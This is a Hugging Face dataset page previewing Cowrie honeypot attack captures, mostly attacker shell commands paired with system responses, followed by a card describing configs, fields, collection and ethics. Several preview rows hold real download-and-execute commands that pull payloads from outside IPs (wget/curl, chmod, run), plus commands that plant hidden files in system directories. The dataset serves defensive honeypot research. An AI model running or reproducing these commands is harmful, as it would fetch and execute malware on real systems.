>/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var/run# >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var/tmp#
The terminal created a new file named '.l' in the '/var/tmp' directory and changed the working directory to '/var/tmp'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
6
>/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var/tmp# >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/#
The terminal created a new file named '.l' in the root directory and changed the working directory to root. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
7
>/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/# >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev/netslink#
The terminal created a new file named '.l' in the '/dev/netslink' directory and changed the working directory to '/dev/netslink'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
8
>/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev/netslink# >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev/shm#
The terminal created a new file named '.l' in the '/dev/shm' directory and changed the working directory to '/dev/shm'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
9
>/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev/shm# >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/bin#
The terminal created a new file named '.l' in the '/bin' directory and changed the working directory to '/bin'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
10
>/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/bin# >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/etc#
The terminal created a new file named '.l' in the '/etc' directory and changed the working directory to '/etc'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
11
>/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/etc# >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/boot#
The terminal created a new file named '.l' in the '/boot' directory and changed the working directory to '/boot'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
12
>/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/boot# >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/usr#
The terminal created a new file named '.l' in the '/usr' directory and changed the working directory to '/usr'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
13
>/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/usr# >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/sys#
The terminal created a new file named '.l' in the '/sys' directory and changed the working directory to '/sys'. Then it echoed the string 'PATH_DONE' to the terminal.
2
curated_ubuntu
eb06648a0e7c
2021_2022
14
wget http://194.31.98.244/ssh/spc -O- > ntpclient; chmod 777 ntpclient; ./ntpclient test.wget.spc
root@ubuntu:/sys# wget http://194.31.98.244/ssh/spc -O- > ntpclient; chmod 777 ntpclient; ./ntpclient test.wget.spc --2023-10-31 14:53:28-- http://194.31.98.244/ssh/spc Connecting to 194.31.98.244:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] Saving to: ‘STDOUT’ - ...
The terminal downloaded a file from 'http://194.31.98.244/ssh/spc' and saved it as 'ntpclient' in the '/sys' directory. The file was given full permissions and executed with the argument 'test.wget.spc'.
3
curated_ubuntu
168050abcd80
2021_2022
0
uname -a
root@ubuntu:~# uname -a Linux user 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
168050abcd80
2021_2022
1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd; ./krane oracle
root@ubuntu:~# cd /tmp || cd /var/run || cd /mnt || cd /root || cd / root@tmp:~# wget 209.141.58.203/ssh --2023-10-31 14:53:54-- http://209.141.58.203/ssh Connecting to 209.141.58.203:80... connected. HTTP request sent, awaiting response... 200 OK Length: 28 [application/x-sh] Saving to: ‘ssh’ 100%[==================...
- The terminal changed the working directory to '/tmp'. - A file named 'ssh' was downloaded from the server with IP '209.141.58.203'. - The 'ssh' file was extracted. - The terminal changed the working directory to '.ssh' within '/tmp'. - All files within the '.ssh' directory were given execute permissions. - Two scrip...
4
curated_ubuntu
5993bb93b706
2021_2022
0
start
root@ubuntu:~# start start: missing job name Try `start --help' for more information. root@ubuntu:~#
No changes were made to the system as the 'start' command requires a job name to start a service.
0
curated_ubuntu
5993bb93b706
2021_2022
1
enable
root@ubuntu:~# enable bash: enable: usage: enable [-a] [-dnps] [-f filename] [name ...] root@ubuntu:~#
No changes were made to the system as the 'enable' command requires additional parameters to enable a shell built-in command.
0
curated_ubuntu
5993bb93b706
2021_2022
2
config terminal
root@ubuntu:~# config terminal bash: config: command not found root@ubuntu:~#
No changes were made to the system as the 'config' command is not recognized in this environment.
0
curated_ubuntu
5993bb93b706
2021_2022
3
system
root@ubuntu:~# system bash: system: command not found root@ubuntu:~#
No changes were made to the system as the 'system' command is not recognized in this environment.
0
curated_ubuntu
5993bb93b706
2021_2022
4
linuxshell
root@ubuntu:~# linuxshell bash: linuxshell: command not found root@ubuntu:~#
No changes were made to the system as the 'linuxshell' command is not recognized in this environment.
0
curated_ubuntu
5993bb93b706
2021_2022
5
su
root@ubuntu:~# su root@ubuntu:~#
No changes were made to the system as the 'su' command without any parameters will not change the current user when already logged in as root.
0
curated_ubuntu
5993bb93b706
2021_2022
6
shell
root@ubuntu:~# shell bash: shell: command not found root@ubuntu:~#
No changes were made to the system as the 'shell' command is not recognized in this environment.
0
curated_ubuntu
End of preview. Expand in Data Studio

Shell Honeypot Attack Request–Response Dataset

A standardized, MITRE ATT&CK–annotated dataset of post-login shell attacks captured by Cowrie SSH/Telnet honeypots across two collection periods — 2021–2022 and 2024. It pairs attacker shell commands with real captured system responses, enabling both longitudinal threat analysis and the training/evaluation of AI-driven honeypots.

This is the open-source release accompanying the paper “Unveiling Evolving Threats: A Data Analysis for Next-Generation Honeypot Development” (IEEE SRDS 2025).

🔎 Dataset Viewer. Use the interactive table at the top of this page to browse the data without downloading anything: pick a config from the dropdown (request_response (default), commands, sessions, attack_ttp_tactics_paper, attack_ttp_techniques_paper, attack_ttp_tactics_derived, attack_ttp_techniques_derived) and a split, then page or run SQL over the rows. The flagship request_response / curated split is the quickest way to see command → real-response pairs with their system_change and severity_vi labels.

Why this dataset

Honeypot research has long been held back by the absence of an open, high-fidelity request–response dataset. Most public corpora contain isolated attack logs with no system responses, making it impossible to benchmark how convincingly a honeypot replies to an attacker. This dataset addresses that gap by providing:

  • Real system responses for attacker commands (captured by replaying attacks inside instrumented production-like environments), not just the requests.
  • A longitudinal pair of periods (2021–2022 vs. 2024) with comparable volume, enabling study of how shell-attack tactics evolve.
  • Per-session MITRE ATT&CK technique sequences, so each interaction is mapped to adversary tactics and techniques.
  • A harm/severity index Vi ∈ [0,4] on the curated request–response split, for training response-risk classifiers.

Dataset structure

The dataset is published as loadable JSONL configs. request_response is the default config.

Config Splits Rows One row =
request_response (default) vm_replay_2021_2022, curated 1,512 / 1,489 a single command → real system response turn
commands 2021_2022, 2024 12,923 / 4,236 a unique shell command + its frequency, complexity, and abstracted pattern
sessions 2021_2022, 2024 5,365 / 6,658 one effective attack session (commands grouped by attacker IP) + its ATT&CK technique sequence
attack_ttp_tactics_paper train 9 SRDS Table VI — ATT&CK tactic usage share per period (authoritative)
attack_ttp_techniques_paper train 26 SRDS Table VII — ATT&CK technique usage share per period (authoritative)
attack_ttp_tactics_derived train 19 per-session tactic coverage recomputed from the released sessions (supplementary)
attack_ttp_techniques_derived train 49 per-session technique coverage recomputed from the released sessions (supplementary)
from datasets import load_dataset

# Flagship request–response interactions (real captured responses)
rr = load_dataset("Ziyang23423432/shell-attack-evolution-dataset",
                  "request_response", split="curated")
print(rr[0])

# Per-period sessions with ATT&CK technique sequences
sess = load_dataset("Ziyang23423432/shell-attack-evolution-dataset",
                    "sessions", split="2024")

commands

Each unique command observed in a period.

Field Type Description
command string the raw shell command as typed by the attacker
period string 2021_2022 or 2024
frequency int number of times this exact command was observed
is_complex bool true if the command contains shell operators (| & ; > < \`` $(`)
command_pattern string | null the abstracted operator pattern (parameters stripped)

sessions

Each effective attack session = all post-authentication commands from one attacker IP, in order.

Field Type Description
session_id string stable anonymized id, sha1(period|ip)[:12]
period string 2021_2022 or 2024
src_ip string attacker source IP (see Ethics below)
commands list[string] ordered commands issued in the session
command_count int session length (number of commands)
session_pattern string | null the session's command-pattern signature
attack_techniques list[string] ordered MITRE ATT&CK techniques invoked (consecutive duplicates collapsed)

request_response (flagship)

A single attacker turn paired with the real system response.

Field Type Description
session_id string session this turn belongs to
period string origin period of the attack commands
turn_index int 0-based position of the turn within the session
command string the attacker request
response string the real terminal/system response
system_change string | null natural-language description of the induced system state change (curated split only)
severity_vi int | null harm index Vi ∈ [0,4], higher = more dangerous (curated split only)
response_source string real_vm or curated_ubuntu (see below)

Two response variants are provided for the same set of representative attack-session templates (the split key sets are identical), which makes this a natural real-vs-curated response benchmark:

  • vm_replay_2021_2022 — raw responses captured by replaying the attacks on a real VM (real_vm). Locale strings may appear in the original (non-English) system language; preserved verbatim for fidelity.
  • curated — the same sessions replayed in a standardized Ubuntu 22.04 environment (curated_ubuntu), with clean English output and two added annotations: a system_change description and a severity_vi harm index.

severity_vi distribution on the curated split: 0: 591, 1: 35, 2: 669, 3: 71, 4: 123 (+ a few unscored turns).

attack_ttp_* (ATT&CK usage frequencies)

MITRE ATT&CK usage frequencies, in two views split across four single-table configs (each a single train split):

  • Authoritative (the paper's figures), shipped verbatimattack_ttp_tactics_paper (SRDS Table VI) and attack_ttp_techniques_paper (Table VII): columns share_2021_2022, share_2024, trend — command-weighted shares exactly as reported in the paper (e.g. Defense Evasion 0.0758 → 0.3877).
  • Supplementary, derived from the released sessionsattack_ttp_tactics_derived / attack_ttp_techniques_derived: a per-session coverage share (session_count / total_sessions_in_period) recomputed from this dataset. It uses a different denominator than the paper's command-weighted share, so values differ; provided for reproducibility, not as the headline figure.
from datasets import load_dataset
tactics = load_dataset("Ziyang23423432/shell-attack-evolution-dataset",
                       "attack_ttp_tactics_paper", split="train")

Data collection & preprocessing

Attacks were captured by Cowrie honeypots deployed on the public Internet (2021–2022 sources cowrie-20210406–20210611 and cowrie-20220609–20220704; 2024 captured over 2024-03-01 – 2024-06-26). Only sessions that successfully authenticated and issued commands are retained. Sessions are segmented per attacker IP. The raw logs were cleaned for three Cowrie-specific artifacts: (1) incorrectly segmented multi-line shell scripts, (2) redundant echo/prompt lines wrongly recorded as commands, and (3) repeated automated re-attacks from the same source. System responses were collected by replaying grouped sessions in production-like environments; live malware download URLs were replaced with inert local files so that responses could be captured safely. See ../analysis/ for the full, runnable preprocessing pipeline and ../scripts/build_dataset.py for the exact code that derives every file here.

raw_samples/cowrie_ssh_2024_sample.jsonl contains a 300-line sample of the raw Cowrie event log format for reference.

Intended uses

  • AI-driven honeypot training — teach a model to generate realistic shell responses from request_response.
  • Response-risk classification — predict severity_vi from a command/response.
  • TTP / threat-intelligence analysis — study tactic evolution via sessions and attack_ttp.
  • Honeypot fidelity benchmarking — compare a candidate honeypot's responses against the real vm_replay / curated responses.

Ethics, safety & limitations

  • No malware is distributed. Binary payloads downloaded during the original captures are deliberately excluded; only defanged download URLs / filenames are retained for analysis.
  • Attacker IPs are included (as is standard for honeypot corpora) because they carry research value; they belong to attacking hosts, not victims. A stable anonymized session_id is also provided if you prefer to drop src_ip.
  • Commands may contain credentials/keys that attackers typed; these are the attackers' own injected values, not third-party secrets.
  • Honeypot data reflects only a subset of global attack activity and is biased by deployment geography and the honeypot's emulated profile. Curated responses are produced in one standardized environment and may differ from other systems.
  • Antivirus note (Windows). Because the request_response / commands fields contain real attacker payloads (encoded shellcode, malware download commands, etc.), local antivirus — notably Windows Defender — may quarantine the cache files datasets writes while building the dataset (e.g. WinError 225). This is an expected false positive on real threat data, not malware in the loader. Loading on Linux (incl. the Hugging Face Hub viewer/infra) is unaffected; on Windows, add an exclusion for the ~/.cache/huggingface folder or load with keep_in_memory=True.

Citation

@inproceedings{wang2025unveiling,
  title     = {Unveiling Evolving Threats: A Data Analysis for
               Next-Generation Honeypot Development},
  author    = {Wang, Ziyang and Lv, Shichao and Wang, Haining and You, Jianzhou
               and Liu, Shuoyang and Yuan, Tianwei and Lu, Xiao and Sun, Limin},
  booktitle = {IEEE International Symposium on Reliable Distributed Systems (SRDS)},
  year      = {2025},
  url       = {https://ieeexplore.ieee.org/document/11360425/}
}

License

Released under CC BY 4.0. The accompanying code in this repository is under the MIT License.

Downloads last month
10